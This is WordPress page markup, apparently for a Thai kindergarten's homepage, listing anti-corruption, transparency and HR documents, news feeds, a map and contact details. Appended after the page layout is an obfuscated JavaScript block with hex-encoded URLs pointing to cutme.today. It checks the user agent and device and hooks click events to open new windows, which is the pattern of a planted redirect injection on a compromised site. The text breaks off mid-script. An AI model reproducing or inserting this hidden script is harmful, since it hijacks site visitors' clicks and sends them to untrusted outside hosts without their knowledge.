{\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4